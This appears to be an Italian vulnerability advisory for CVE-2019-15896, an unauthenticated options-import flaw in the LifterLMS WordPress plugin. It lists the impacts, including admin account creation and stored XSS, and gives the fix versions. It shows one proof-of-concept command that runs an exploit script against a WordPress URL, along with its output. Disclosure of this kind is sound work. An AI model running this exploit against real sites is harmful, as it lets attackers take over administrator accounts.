
LifterLMS <= 3.34.5 - Importazione delle Opzioni non autenticata
LifterLMS <= 3.34.5 - Importazione Opzioni Non Autenticata
L'importazione di opzioni non autenticata, che potrebbe portare a
Reindirizzamento del sito web
Creazione di un account amministratore
Iniezione di contenuti
Stored XSS
I problemi sono stati segnalati come risolti nella versione 3.35.0. Tuttavia la v3.35.1 ha aggiunto ulteriori sanitizzazioni e filtri degli input.
$ python3 CVE-2019-15896.py --url http://wordpress.lan --username radmin --email [email protected] LifterLMS <= 3.34.5 - Unauthenticated Options Import Exploit By Ramdom Robbie Once ran check your email for the forgotten password link. Password reset email sent to [email protected]
Info
---
Richiede accesso a login.php e un indirizzo email funzionante e il sito deve essere in grado di inviare email